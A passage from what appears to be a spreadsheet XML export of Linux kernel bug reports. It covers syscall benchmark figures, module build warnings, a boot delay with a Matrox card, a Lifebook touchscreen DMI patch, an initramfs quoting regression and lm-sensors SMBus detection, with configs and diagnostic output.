microseconds - smaller is better &gt;---------------------------------------------------------------- &gt;Host OS Mhz null null open selct sig sig fork exec sh &gt; call I/O stat clos TCP inst hndl proc proc proc &gt;--------- ------------- ---- ---- ---- ---- ---- ----- ---- ---- ---- ---- ---- &gt;stp2-003. Linux 2.4.18 1000 0.39 0.67 3.89 4.99 30.4 0.93 3.06 344. 1403 4465 &gt;stp2-000. Linux 2.5.60 1000 0.41 0.77 4.34 5.57 32.6 1.15 3.59 245. 1406 5795 Note that those numbers will look quite different (at least on a P4) if you use a modern library that uses the "sysenter" stuff. The difference ends up being something like this: Host OS Mhz null null open selct sig sig fork exec sh call I/O stat clos inst hndl proc proc proc --------- ------------- ---- ---- ---- ---- ---- ----- ---- ---- ---- ---- ---- i686-linu Linux 2.5.30 2380 0.8 1.1 3 5 0.04K 1.1 3 0.2K 1K 3K i686-linu Linux 2.5.62 2380 0.2 0.6 3 4 0.04K 0.7 3 0.2K 1K 3K (Yeah, I've never run a 2.4.x kernel on this machine, so..) In other words, the system call has been speeded up quite noticeably. Yes, if you don't take advantage of sysenter, then all the sysenter support will just make us look worse ;( I'm surprised by your "sh proc" changes, they are quite big. I guess it's rmap and highmem that bites us, and yes, we've gotten slower there. Linus</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Distribution: gentoo Hardware Environment: dynalink isdn card "winbond", athlon xp Software Environment: gcc 3.2.3 Problem Description: make modules gives: make[1]: `arch/i386/kernel/asm-offsets.s' is up to date. Starting the build. KBUILD_BUILTIN= KBUILD_MODULES=1 Building modules, stage 2. MODPOST *** Warning: "mmu_cr4_features" [drivers/char/drm/radeon.ko] undefined! *** Warning: "group_send_sig_info" [drivers/isdn/i4l/isdn.ko] undefined! *** Warning: "kstat__per_cpu" [drivers/isdn/hisax/hisax.ko] undefined! Steps to reproduce: CONFIG_X86=y CONFIG_MMU=y CONFIG_UID16=y CONFIG_GENERIC_ISA_DMA=y CONFIG_EXPERIMENTAL=y CONFIG_SWAP=y CONFIG_SYSVIPC=y CONFIG_SYSCTL=y CONFIG_LOG_BUF_SHIFT=14 CONFIG_FUTEX=y CONFIG_EPOLL=y CONFIG_MODULES=y CONFIG_MODULE_UNLOAD=y CONFIG_MODULE_FORCE_UNLOAD=y CONFIG_OBSOLETE_MODPARM=y CONFIG_KMOD=y CONFIG_X86_PC=y CONFIG_MK7=y CONFIG_X86_CMPXCHG=y CONFIG_X86_XADD=y CONFIG_X86_L1_CACHE_SHIFT=6 CONFIG_RWSEM_XCHGADD_ALGORITHM=y CONFIG_X86_WP_WORKS_OK=y CONFIG_X86_INVLPG=y CONFIG_X86_BSWAP=y CONFIG_X86_POPAD_OK=y CONFIG_X86_GOOD_APIC=y CONFIG_X86_INTEL_USERCOPY=y CONFIG_X86_USE_PPRO_CHECKSUM=y CONFIG_X86_USE_3DNOW=y CONFIG_PREEMPT=y CONFIG_X86_TSC=y CONFIG_X86_MCE=y CONFIG_EDD=y CONFIG_NOHIGHMEM=y CONFIG_1GB=y CONFIG_MTRR=y CONFIG_HAVE_DEC_LOCK=y CONFIG_PM=y CONFIG_ACPI=y CONFIG_ACPI_BOOT=y CONFIG_ACPI_AC=y CONFIG_ACPI_BATTERY=y CONFIG_ACPI_BUTTON=y CONFIG_ACPI_FAN=y CONFIG_ACPI_PROCESSOR=y CONFIG_ACPI_THERMAL=y CONFIG_ACPI_BUS=y CONFIG_ACPI_INTERPRETER=y CONFIG_ACPI_EC=y CONFIG_ACPI_POWER=y CONFIG_ACPI_PCI=y CONFIG_ACPI_SYSTEM=y CONFIG_PCI=y CONFIG_PCI_GOANY=y CONFIG_PCI_BIOS=y CONFIG_PCI_DIRECT=y CONFIG_PCI_LEGACY_PROC=y CONFIG_PCI_NAMES=y CONFIG_KCORE_ELF=y CONFIG_BINFMT_AOUT=y CONFIG_BINFMT_ELF=y CONFIG_BINFMT_MISC=y CONFIG_PNP=y CONFIG_PNP_NAMES=y CONFIG_BLK_DEV_FD=y CONFIG_BLK_DEV_LOOP=y CONFIG_BLK_DEV_RAM=y CONFIG_BLK_DEV_RAM_SIZE=4096 CONFIG_BLK_DEV_INITRD=y CONFIG_LBD=y CONFIG_IDE=y CONFIG_BLK_DEV_IDE=y CONFIG_BLK_DEV_IDEDISK=y CONFIG_IDEDISK_MULTI_MODE=y CONFIG_BLK_DEV_IDECD=y CONFIG_BLK_DEV_IDEPCI=y CONFIG_BLK_DEV_GENERIC=y CONFIG_IDEPCI_SHARE_IRQ=y CONFIG_BLK_DEV_IDEDMA_PCI=y CONFIG_IDEDMA_PCI_AUTO=y CONFIG_BLK_DEV_IDEDMA=y CONFIG_BLK_DEV_ADMA=y CONFIG_BLK_DEV_VIA82CXXX=y CONFIG_IDEDMA_AUTO=y CONFIG_BLK_DEV_IDE_MODES=y CONFIG_NET=y CONFIG_PACKET=y CONFIG_UNIX=y CONFIG_INET=y CONFIG_IP_MULTICAST=y CONFIG_IPV6_SCTP__=y CONFIG_NETDEVICES=y CONFIG_DUMMY=y CONFIG_NET_ETHERNET=y CONFIG_NET_VENDOR_3COM=y CONFIG_VORTEX=m CONFIG_PPP=y CONFIG_PPP_MULTILINK=y CONFIG_PPP_FILTER=y CONFIG_PPP_DEFLATE=y CONFIG_PPP_BSDCOMP=y CONFIG_ISDN_BOOL=y CONFIG_ISDN=m CONFIG_ISDN_PPP=y CONFIG_ISDN_PPP_VJ=y CONFIG_ISDN_MPP=y CONFIG_ISDN_PPP_BSDCOMP=m CONFIG_ISDN_CAPI=m CONFIG_ISDN_CAPI_MIDDLEWARE=y CONFIG_ISDN_CAPI_CAPI20=m CONFIG_ISDN_CAPI_CAPIFS_BOOL=y CONFIG_ISDN_CAPI_CAPIFS=m CONFIG_ISDN_CAPI_CAPIDRV=m CONFIG_ISDN_DRV_HISAX=m CONFIG_HISAX_EURO=y CONFIG_HISAX_MAX_CARDS=8 CONFIG_HISAX_W6692=y CONFIG_INPUT=y CONFIG_INPUT_MOUSEDEV=y CONFIG_INPUT_MOUSEDEV_PSAUX=y CONFIG_INPUT_MOUSEDEV_SCREEN_X=1024 CONFIG_INPUT_MOUSEDEV_SCREEN_Y=768 CONFIG_SOUND_GAMEPORT=y CONFIG_SERIO=y CONFIG_SERIO_I8042=y CONFIG_INPUT_KEYBOARD=y CONFIG_KEYBOARD_ATKBD=y CONFIG_INPUT_MOUSE=y CONFIG_MOUSE_PS2=y CONFIG_VT=y CONFIG_VT_CONSOLE=y CONFIG_HW_CONSOLE=y CONFIG_SERIAL_8250=y CONFIG_SERIAL_CORE=y CONFIG_UNIX98_PTYS=y CONFIG_UNIX98_PTY_COUNT=256 CONFIG_HW_RANDOM=y CONFIG_RTC=y CONFIG_AGP=y CONFIG_AGP_VIA=y CONFIG_DRM=y CONFIG_DRM_RADEON=m CONFIG_EXT2_FS=y CONFIG_EXT2_FS_XATTR=y CONFIG_EXT3_FS=y CONFIG_EXT3_FS_XATTR=y CONFIG_EXT3_FS_POSIX_ACL=y CONFIG_JBD=y CONFIG_FS_MBCACHE=y CONFIG_REISERFS_FS=y CONFIG_FS_POSIX_ACL=y CONFIG_AUTOFS4_FS=y CONFIG_ISO9660_FS=y CONFIG_JOLIET=y CONFIG_UDF_FS=y CONFIG_FAT_FS=y CONFIG_MSDOS_FS=y CONFIG_VFAT_FS=y CONFIG_NTFS_FS=y CONFIG_PROC_FS=y CONFIG_DEVFS_FS=y CONFIG_DEVPTS_FS=y CONFIG_TMPFS=y CONFIG_RAMFS=y CONFIG_SMB_FS=y CONFIG_MSDOS_PARTITION=y CONFIG_SMB_NLS=y CONFIG_NLS=y CONFIG_NLS_DEFAULT="iso8859-1" CONFIG_NLS_CODEPAGE_437=y CONFIG_NLS_CODEPAGE_850=y CONFIG_NLS_CODEPAGE_865=y CONFIG_NLS_ISO8859_1=y CONFIG_NLS_UTF8=y CONFIG_FB=y CONFIG_FB_VESA=y CONFIG_VIDEO_SELECT=y CONFIG_VGA_CONSOLE=y CONFIG_DUMMY_CONSOLE=y CONFIG_FRAMEBUFFER_CONSOLE=y CONFIG_PCI_CONSOLE=y CONFIG_FONT_8x8=y CONFIG_FONT_8x16=y CONFIG_LOGO=y CONFIG_LOGO_LINUX_MONO=y CONFIG_LOGO_LINUX_VGA16=y CONFIG_LOGO_LINUX_CLUT224=y CONFIG_SOUND=y CONFIG_SND=y CONFIG_SND_SEQUENCER=y CONFIG_SND_OSSEMUL=y CONFIG_SND_MIXER_OSS=y CONFIG_SND_PCM_OSS=y CONFIG_SND_SEQUENCER_OSS=y CONFIG_SND_EMU10K1=y CONFIG_USB=y CONFIG_USB_DEVICEFS=y CONFIG_USB_BANDWIDTH=y CONFIG_USB_EHCI_HCD=y CONFIG_USB_UHCI_HCD=y CONFIG_USB_HID=y CONFIG_USB_HIDINPUT=y CONFIG_DEBUG_INFO=y CONFIG_ZLIB_INFLATE=y CONFIG_ZLIB_DEFLATE=y CONFIG_X86_BIOS_REBOOT=y</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Distribution: SUSE 9.1 Professional Hardware Environment: Tyan S2460 board and Matrox G450 DH Software Environment: Immediately after load with GRUB or LILO Problem Description: With Linux 2.6.x kernels, option 'Video Mode Selection Support' causes a 2 minute delay with blank screen from kernel load via bootloader to appearance of any text on console Steps to reproduce: Linux kernel 2.6.x, compiled with 'Video Mode Selection Support' option, Tyan S2460 board and Matrox G450 DH. My Writeup: Problem: ======== With Linux 2.6.x kernels, option 'Video Mode Selection Support' causes a 2 minute delay with blank screen from kernel load via bootloader to appearance of any text on console Hardware: ========= Matrox g450, Tyan S2460 Essential Combination for fault: ================================ Linux kernel 2.6.x, compiled with 'Video Mode Selection Support' option, Tyan S2460 board and Matrox G450 DH. This combination with any one of the following changes does not give the fault: *** Kernel compiled without 'Video Mode Selection Support' option *** Kernel 2.4.x *** Different graphics card type [Videologic] *** Different mainboard Other notes: ============ May relate to report 1858, but filed separately as I think I am giving a lot more specifics and I will leave others to judge whether to make the link. Problem occurs with 2 examples of Matrox G450 card. First observed with SUSE kernel 2.6.4-54.5-default from version 9.1 profesional. Repeatable with various kernel.org 2.6.x kernels. Repeatable from SUSE 9.1 bootable DVD [delay here is 4 minutes]. Compilation change was applied only to SUSE kernel, and was only change necessary for a fix AFAICT. Only tried different mainboard with SUSE kernel from bootable DVD. A similar fault is discussed here: http://forums.whirlpool.net.au/forum-replies.cfm?t=196564&amp;p=-1 I originally raised this issue here: http://lists.suse.de/archive/suse-linux-e/2004-May/1573.html</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Most recent kernel where this bug did not occur: as far as i know this bug occurs since lifebook touchscreen support was integrated into the kernel (around 2.6.13) Distribution: slackware 10.2 Hardware Environment: Fujitsu LifeBook B142 (Product s/n FPC01003B, italian keyboard) Software Environment: Gnu C 3.3.6 Gnu make 3.80 binutils 2.15.92.0.2 util-linux 2.12p mount 2.12p module-init-tools 3.1 e2fsprogs 1.38 reiserfsprogs 3.6.19 reiser4progs line pcmcia-cs 3.2.8 PPP 2.4.4b1 Linux C Library 2.3.5 Dynamic linker (ldd) 2.3.5 Linux C++ Library 5.0.7 Procps 3.2.5 Net-tools 1.60 Kbd 1.12 Sh-utils 5.2.1 udev 064 Modules Loaded floppy ipv6 snd_pcm_oss snd_mixer_oss ohci_hcd ehci_hcd piix uhci_hcd usbcore snd_es1938 snd_pcm snd_page_alloc snd_opl3_lib snd_timer snd_hwdep snd_mpu401_uart snd_rawmidi snd_seq_device snd soundcore 8139too pcmcia firmware_class yenta_socket rsrc_nonstatic pcmcia_core ide_scsi evdev Problem Description: The "Fujitsu B-series Lifebook PS/2 TouchScreen driver" (drivers/input/mouse/lifebook.c) tries to match the product name from DMI with "LIFEBOOK B Series" in order to detect the touchscreen. My Lifebook DMI contains "LifeBook B142" as product name, therefore the kernel detects the touchscreen as a generic ps/2 mouse. (I extracted the DMI data with dmidecode-2.7) Steps to reproduce: cat /proc/bus/input/devices (no "Lifebook TouchScreen" listed) Possible patch: diff -uprN linux-2.6.13.2/drivers/input/mouse/lifebook.c linux_patched-2.6.13.2/drivers/input/mouse/lifebook.c --- linux-2.6.13.2/drivers/input/mouse/lifebook.c 2005-09-17 01:02:12.000000000 +0000 +++ linux_patched-2.6.13.2/drivers/input/mouse/lifebook.c 2005-09-30 13:21:33.000000000 +0000 @@ -27,6 +27,12 @@ static struct dmi_system_id lifebook_dmi DMI_MATCH(DMI_PRODUCT_NAME, "LIFEBOOK B Series"), }, }, + { + .ident = "Lifebook B", + .matches = { + DMI_MATCH(DMI_PRODUCT_NAME, "LifeBook B"), + }, + }, { } };</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Most recent kernel where this bug did not occur: 2.6.16.21 Distribution: Hardware Environment: Software Environment: Problem Description: The usr/Makefile does not fix the quote as in 2.6.16. The dirs and files listed in initramfs source string are taken as one arg, instead of seperated args. CHK include/linux/version.h CHK include/linux/compile.h HOSTCC usr/gen_init_cpio /home/hippo/linux-2.6.17/scripts/gen_initramfs_list.sh: Cannot open '~/dirA ~/dirB ~/listC' make[2]: *** [usr/initramfs_data.cpio.gz] Error 1 make[1]: *** [usr] Error 2 make: *** [_all] Error 2 In 2.6.16 kernel, usr/Makefile has echo to fix this problem. # The $(shell echo $(CONFIG_INITRAMFS_SOURCE)) is to remove the # gratuitous begin and end quotes from the Kconfig string type. # Internal, escaped quotes in the Kconfig string will loose the # escape and become active quotes. quotefixed_initramfs_source := $(shell echo $(CONFIG_INITRAMFS_SOURCE)) Steps to reproduce: in kernel .config, CONFIG_INITRAMFS_SOURCE="~/dirA ~/dirB ~/listC"</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Most recent kernel where this bug did not occur: NA Distribution: Debian Sarge 3.1 - running Deb Testing Kernel 2.6.15 compliled from deb.source. The changelogs in the kernel do not reference any further changes in this area since this kernel release. Hardware Environment: Mobo ASUS PU-DLS (S for SCSI, should also apply to PU-DL) latest Bios 1008 Xeon 2.4 512M, running PCI-X. Has SMBus connector for other devices, which is "obvously" on the I2C bus. Main chip is an Intel E7501 (Plumas 533) MCH which I believe is the adapter; Intel 82801CA/CAM (ICH3). Software Environment: sensors version 2.10.0 with libsensors version 2.10.0 I2C is compiled in as a module, in the kernel .config file, as per the 2.6 settings at lmsensors site. Problem Description: In a nutshell, need to turn on the SMBus PCI device for an ASUS mobo. How to hack quirks.c and where to start for a beginner. There was reference to this mobo, back in May 03, with the following thread; http://lists.lm-sensors.org/pipermail/lm-sensors/2003-May/002471.html and then again in Aug 03 http://lists.lm-sensors.org/pipermail/lm-sensors/2003-August/004177.html Have done sensors-detect, and found only the i2c-isa bus driver, and pc87360 driver, which is not returning any sensor information. I'm prepared to get this working, but I don't know where to start. I have as much information as I can at this stage to get things started, and am prepared for the long haul. I have read the README.p4b, and about driver `i2c-i801.o' and the 2.6 kernel calling the quirks.c code. I have looked at the quirks code, and not found anything relating specifically to this system or chip in this code. lspci 0000:00:00.0 Host bridge: Intel Corp. E7501 Memory Controller Hub (rev 01) 0000:00:00.1 ff00: Intel Corp. E7500/E7501 Host RASUM Controller (rev 01) 0000:00:02.0 PCI bridge: Intel Corp. E7500/E7501 Hub Interface B PCI-to-PCI Bridge (rev 01) 0000:00:1d.0 USB Controller: Intel Corp. 82801CA/CAM USB (Hub #1) (rev 02) 0000:00:1d.1 USB Controller: Intel Corp. 82801CA/CAM USB (Hub #2) (rev 02) 0000:00:1d.2 USB Controller: Intel Corp. 82801CA/CAM USB (Hub #3) (rev 02) 0000:00:1e.0 PCI bridge: Intel Corp. 82801 PCI Bridge (rev 42) 0000:00:1f.0 ISA bridge: Intel Corp. 82801CA LPC Interface Controller (rev 02) 0000:00:1f.1 IDE interface: Intel Corp. 82801CA Ultra ATA Storage Controller (rev 02) 0000:01:1c.0 PIC: Intel Corp. 82870P2 P64H2 I/OxAPIC (rev 04) 0000:01:1d.0 PCI bridge: Intel Corp. 82870P2 P64H2 Hub PCI Bridge (rev 04) 0000:01:1e.0 PIC: Intel Corp. 82870P2 P64H2 I/OxAPIC (rev 04) 0000:01:1f.0 PCI bridge: Intel Corp. 82870P2 P64H2 Hub PCI Bridge (rev 04) 0000:03:03.0 Ethernet controller: Intel Corp. 82544GC Gigabit Ethernet Controller (LOM) (rev 02) 0000:03:05.0 RAID bus controller: 3ware Inc 3ware ATA-RAID 0000:04:01.0 Ethernet controller: Intel Corp. 82540EM Gigabit Ethernet Controller (rev 02) 0000:04:02.0 VGA compatible controller: ATI Technologies Inc Rage XL (rev 27) lspci -n 0000:00:00.0 0600: 8086:254c (rev 01) 0000:00:00.1 ff00: 8086:2541 (rev 01) 0000:00:02.0 0604: 8086:2543 (rev 01) 0000:00:1d.0 0c03: 8086:2482 (rev 02) 0000:00:1d.1 0c03: 8086:2484 (rev 02) 0000:00:1d.2 0c03: 8086:2487 (rev 02) 0000:00:1e.0 0604: 8086:244e (rev 42) 0000:00:1f.0 0601: 8086:2480 (rev 02) 0000:00:1f.1 0101: 8086:248b (rev 02) 0000:01:1c.0 0800: 8086:1461 (rev 04) 0000:01:1d.0 0604: 8086:1460 (rev 04) 0000:01:1e.0 0800: 8086:1461 (rev 04) 0000:01:1f.0 0604: 8086:1460 (rev 04) 0000:03:03.0 0200: 8086:100d (rev 02) 0000:03:05.0 0104: 13c1:1002 0000:04:01.0 0200: 8086:100e (rev 02) 0000:04:02.0 0300: 1002:4752 (rev 27) lsmod # reduced set of modules. Module Size Used by dm_mod 53624 6 pc87360 20784 0 hwmon_vid 2528 1 pc87360 i2c_isa 4832 1 pc87360 i2c_core 19952 2 pc87360,i2c_isa shpchp 42592 0 pci_hotplug 26132 1 shpchp piix 9700 0 [permanent] thermal 13640 0 processor 23680 1 thermal fan 4612 0 # sensors-detect revision 1.413 (2006/01/19 20:28:00) Do you want to scan the ISA bus? (YES/no): Probing for `National Semiconductor LM78' Trying address 0x0290... Failed! Probing for `National Semiconductor LM78-J' Trying address 0x0290... Failed! Probing for `National Semiconductor LM79' Trying address 0x0290... Failed! Probing for `Winbond W83781D' Trying address 0x0290... Failed! Probing for `Winbond W83782D' Trying address 0x0290... Failed! Probing for `Winbond W83627HF' Trying address 0x0290... Failed! Probing for `Winbond W83627EHF' Trying address 0x0290... Failed! Probing for `Silicon Integrated Systems SIS5595' Trying general detect... Failed! Probing for `VIA Technologies VT82C686 Integrated Sensors' Trying general detect... Failed! Probing for `VIA Technologies VT8231 Integrated Sensors' Trying general detect... Failed! Probing for `ITE IT8712F' Trying address 0x0290... Failed! Probing for `ITE IT8705F / SiS 950' Trying address 0x0290... Failed! Probing for `IPMI BMC KCS' Trying address 0x0ca0... Failed! Probing for `IPMI BMC SMIC' Trying address 0x0ca8... Failed! Do you want to scan for Super I/O sensors? (YES/no): Probing for `ITE 8702F Super IO Sensors' Failed! (0xe115) Probing for `ITE 8705F Super IO Sensors' Failed! (0xe115) Probing for `ITE 8712F Super IO Sensors' Failed! (0xe115) Probing for `Nat. Semi. PC87351 Super IO Fan Sensors' Failed! (0xe1) Probing for `Nat. Semi. PC87360 Super IO Fan Sensors' Success... found at address 0xecc0 Probing for `Nat. Semi. PC87363 Super IO Fan Sensors' Failed! (0xe1) Probing for `Nat. Semi. PC87364 Super IO Fan Sensors' Failed! (0xe1) Probing for `Nat. Semi. PC87365 Super IO Fan Sensors' Failed! (0xe1) Probing for `Nat. Semi. PC87365 Super IO Voltage Sensors' Failed! (0xe1) Probing for `Nat. Semi. PC87365 Super IO Thermal Sensors' Failed! (0xe1) Probing for `Nat. Semi. PC87366 Super IO Fan Sensors' Failed! (0xe1) Probing for `Nat. Semi. PC87366 Super IO Voltage Sensors' Failed! (0xe1) Probing for `Nat. Semi. PC87366 Super IO Thermal Sensors' Failed! (0xe1) Probing for `Nat. Semi. PC87372 Super IO Fan Sensors' Failed! (0xe1) Probing for `Nat. Semi. PC87373 Super IO Fan Sensors' Failed! (0xe1) Probing for `Nat. Semi. PC87591 Super IO' Failed! (0xe1) Probing for `Nat. Semi. PC87371 Super IO' Failed! (0xe1) Probing for `Nat. Semi. PC97371 Super IO' Failed! (0xe1) Probing for `Nat. Semi. PC8739x Super IO' Failed! (0xe1) Probing for `Nat. Semi. PC8741x Super IO' Failed! (0xe1) Probing for `Nat. Semi. PCPC87427 Super IO' Failed! (0xe1) Probing for `SMSC 47B27x Super IO Fan Sensors' Failed! (0xe1) Probing for `SMSC 47M10x/13x Super IO Fan Sensors' Failed! (0xe1) Probing for `SMSC 47M14x Super IO Fan Sensors' Failed! (0xe1) Probing for `SMSC 47M15x/192/997 Super IO Fan Sensors' Failed! (0xe1) Probing for `SMSC 47S42x Super IO Fan Sensors' Failed! (0xe1) Probing for `SMSC 47S45x Super IO Fan Sensors' Failed! (0xe1) Probing for `SMSC 47M172 Super IO' Failed! (0xe1) Probing for `SMSC LPC47B397-NC Super IO' Failed! (0xe1) Probing for `SMSC SCH5307-NS Super IO' Failed! (0xe1) Probing for `VT1211 Super IO Sensors' Failed! (0xe1) Probing for `Winbond W83627HF Super IO Sensors' Failed! (0xe1) Probing for `Winbond W83627THF Super IO Sensors' Failed! (0xe1) Probing for `Winbond W83637HF Super IO Sensors' Failed! (0xe1) Probing for `Winbond W83687THF Super IO Sensors' Failed! (0xe1) Probing for `Winbond W83697HF Super IO Sensors' Failed! (0xe1) Probing for `Winbond W83697SF/UF Super IO PWM' Failed! (0xe1) Probing for `Winbond W83L517D Super IO' Failed! (0xe1) Probing for `Fintek F71805F/FG Super IO Sensors' Failed! (0xe115) Probing for `Winbond W83627EHF/EHG Super IO Sensors' Failed! (0xe115) Do you want to scan for secondary Super I/O sensors? (YES/no): Probing for `ITE8702F Super IO Sensors' Failed! (skipping family) Probing for `Nat. Semi. PC87351 Super IO Fan Sensors' Failed! (skipping family) Probing for `SMSC 47B27x Super IO Fan Sensors' Failed! (skipping family) Probing for `VT1211 Super IO Sensors' Failed! (skipping family) Probing for `Winbond W83627EHF/EHG Super IO Sensors' Failed! (skipping family) Now follows a summary of the probes I have just done. Just press ENTER to continue: Driver `pc87360' (should be inserted): Detects correctly: * ISA bus address 0xecc0 (Busdriver `i2c-isa') Chip `Nat. Semi. PC87360 Super IO Fan Sensors' (confidence: 9) I will now generate the commands needed to load the I2C modules. To make the sensors modules behave correctly, add these lines to /etc/modules: #----cut here---- # I2C adapter drivers i2c-isa # I2C chip drivers pc87360 #----cut here---- Output from sensors; pc87360-isa-ecc0 Adapter: ISA adapter In the log/messages file; following may be of note; PCI quirk: region e400-e47f claimed by ICH4 ACPI/GPIO/TCO PCI quirk: region ec00-ec3f claimed by ICH4 GPIO PCI: Ignoring BAR0-3 of IDE controller 0000:00:1f.1 PCI: Transparent bridge - 0000:00:1e.0 PCI: If a device doesn't work, try "pci=routeirq". If it helps, post a report ## What does the above mean, does it relate to hidden PCI device? ls /sys/bus/i2c/devices/ 9191-ecc0 ls /sys/bus/i2c/devices/9191-ecc0 bus driver hwmon:hwmon0 name power uevent Steps to reproduce: Follow the standard lm-sensors install directions.</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Most recent kernel where this bug did not occur: 2.6.17.13 Distribution: Debian 3.1 Hardware Environment: $ cat /proc/cpuinfo processor : 0 vendor_id : AuthenticAMD cpu family : 15 model : 47 model name : AMD Athlon(tm) 64 Processor 3200+ stepping : 2 cpu MHz : 2010.318 cache size : 512 KB fpu : yes fpu_exception : yes cpuid level : 1 wp : yes flags : fpu vme de pse tsc msr pae mce cx8 apic sep mtrr pge mca cmov pat pse36 clflush mmx fxsr sse sse2 syscall nx mmxext fxsr_opt lm 3dnowext 3dnow pni lahf_lm bogomips : 4021.78 TLB size : 1024 4K pages clflush size : 64 cache_alignment : 64 address sizes : 40 bits physical, 48 bits virtual power management: ts fid vid ttp tm stc Software Environment: $ sh scripts/ver_linux If some fields are empty or look unusual you may have an old version. Compare to the current minimal requirements in Documentation/Changes. Linux gaa 2.6.17.13 #2 PREEMPT Thu Sep 14 23:36:04 MSD 2006 x86_64 GNU/Linux Gnu C 4.0.4 Gnu make 3.81 binutils 2.16.91 util-linux 2.12r mount 2.12r module-init-tools 3.2.2 e2fsprogs 1.39-WIP PPP 2.4.4b1 Linux C Library 2.3.6 Dynamic linker (ldd) 2.3.6 Procps 3.2.6 Net-tools 1.60 Console-tools 0.2.3 Sh-utils 5.94 udev 091 Modules Loaded ppp_async crc_ccitt ppp_generic slhc radeon drm ipt_REJECT xt_tcpudp iptable_filter ip_tables x_tables sd_mod nls_cp866 vfat fat fuse snd_seq_dummy snd_seq_oss snd_seq_midi_event snd_seq snd_seq_device it87 hwmon_vid eeprom lm90 hwmon i2c_isa pl2303 usbserial usb_storage scsi_mod 8250_pnp snd_intel8x0 snd_ac97_codec snd_ac97_bus snd_pcm_oss snd_mixer_oss snd_pcm snd_timer ehci_hcd ohci_hcd pcspkr 8250 serial_core psmouse forcedeth parport_pc parport usbcore i2c_nforce2 snd soundcore snd_page_alloc unix $ cat .config # # Automatically generated make config: don't edit # Linux kernel version: 2.6.18 # Wed Sep 20 20:48:01 2006 # CONFIG_X86_64=y CONFIG_64BIT=y CONFIG_X86=y CONFIG_LOCKDEP_SUPPORT=y CONFIG_STACKTRACE_SUPPORT=y CONFIG_SEMAPHORE_SLEEPERS=y CONFIG_MMU=y CONFIG_RWSEM_GENERIC_SPINLOCK=y CONFIG_GENERIC_HWEIGHT=y CONFIG_GENERIC_CALIBRATE_DELAY=y CONFIG_X86_CMPXCHG=y CONFIG_EARLY_PRINTK=y CONFIG_GENERIC_ISA_DMA=y CONFIG_GENERIC_IOMAP=y CONFIG_ARCH_MAY_HAVE_PC_FDC=y CONFIG_DMI=y CONFIG_AUDIT_ARCH=y CONFIG_DEFCONFIG_LIST="/lib/modules/$UNAME_RELEASE/.config" # # Code maturity level options # CONFIG_EXPERIMENTAL=y CONFIG_BROKEN_ON_SMP=y CONFIG_LOCK_KERNEL=y CONFIG_INIT_ENV_ARG_LIMIT=32 # # General setup # CONFIG_LOCALVERSION="" CONFIG_LOCALVERSION_AUTO=y CONFIG_SWAP=y CONFIG_SYSVIPC=y CONFIG_POSIX_MQUEUE=y CONFIG_BSD_PROCESS_ACCT=y # CONFIG_BSD_PROCESS_ACCT_V3 is not set # CONFIG_TASKSTATS is not set # CONFIG_AUDIT is not set # CONFIG_IKCONFIG is not set # CONFIG_RELAY is not set CONFIG_INITRAMFS_SOURCE="" # CONFIG_CC_OPTIMIZE_FOR_SIZE is not set CONFIG_EMBEDDED=y # CONFIG_UID16 is not set CONFIG_SYSCTL=y CONFIG_KALLSYMS=y # CONFIG_KALLSYMS_ALL is not set # CONFIG_KALLSYMS_EXTRA_PASS is not set CONFIG_HOTPLUG=y CONFIG_PRINTK=y CONFIG_BUG=y CONFIG_ELF_CORE=y CONFIG_BASE_FULL=y CONFIG_FUTEX=y CONFIG_EPOLL=y CONFIG_SHMEM=y CONFIG_SLAB=y CONFIG_VM_EVENT_COUNTERS=y CONFIG_RT_MUTEXES=y # CONFIG_TINY_SHMEM is not set CONFIG_BASE_SMALL=0 # CONFIG_SLOB is not set # # Loadable module support # CONFIG_MODULES=y CONFIG_MODULE_UNLOAD=y CONFIG_MODULE_FORCE_UNLOAD=y # CONFIG_MODVERSIONS is not set # CONFIG_MODULE_SRCVERSION_ALL is not set CONFIG_KMOD=y # # Block layer # # CONFIG_LBD is not set # CONFIG_BLK_DEV_IO_TRACE is not set # CONFIG_LSF is not set # # IO Schedulers # CONFIG_IOSCHED_NOOP=y CONFIG_IOSCHED_AS=y CONFIG_IOSCHED_DEADLINE=y CONFIG_IOSCHED_CFQ=y # CONFIG_DEFAULT_AS is not set # CONFIG_DEFAULT_DEADLINE is not set CONFIG_DEFAULT_CFQ=y # CONFIG_DEFAULT_NOOP is not set CONFIG_DEFAULT_IOSCHED="cfq" # # Processor type and features # CONFIG_X86_PC=y # CONFIG_X86_VSMP is not set CONFIG_MK8=y # CONFIG_MPSC is not set # CONFIG_GENERIC_CPU is not set CONFIG_X86_L1_CACHE_BYTES=64 CONFIG_X86_L1_CACHE_SHIFT=6 CONFIG_X86_INTERNODE_CACHE_BYTES=64 CONFIG_X86_TSC=y CONFIG_X86_GOOD_APIC=y # CONFIG_MICROCODE is not set CONFIG_X86_MSR=m CONFIG_X86_CPUID=m CONFIG_X86_IO_APIC=y CONFIG_X86_LOCAL_APIC=y CONFIG_MTRR=y # CONFIG_SMP is not set # CONFIG_PREEMPT_NONE is not set # CONFIG_PREEMPT_VOLUNTARY is not set CONFIG_PREEMPT=y CONFIG_PREEMPT_BKL=y CONFIG_ARCH_SPARSEMEM_ENABLE=y CONFIG_ARCH_FLATMEM_ENABLE=y CONFIG_SELECT_MEMORY_MODEL=y CONFIG_FLATMEM_MANUAL=y # CONFIG_DISCONTIGMEM_MANUAL is not set # CONFIG_SPARSEMEM_MANUAL is not set CONFIG_FLATMEM=y CONFIG_FLAT_NODE_MEM_MAP=y # CONFIG_SPARSEMEM_STATIC is not set CONFIG_SPLIT_PTLOCK_CPUS=4 CONFIG_RESOURCES_64BIT=y CONFIG_ARCH_ENABLE_MEMORY_HOTPLUG=y CONFIG_HPET_TIMER=y CONFIG_HPET_EMULATE_RTC=y CONFIG_IOMMU=y CONFIG_CALGARY_IOMMU=y CONFIG_SWIOTLB=y CONFIG_X86_MCE=y # CONFIG_X86_MCE_INTEL is not set CONFIG_X86_MCE_AMD=y # CONFIG_KEXEC is not set # CONFIG_CRASH_DUMP is not set CONFIG_PHYSICAL_START=0x100000 CONFIG_SECCOMP=y # CONFIG_HZ_100 is not set # CONFIG_HZ_250 is not set 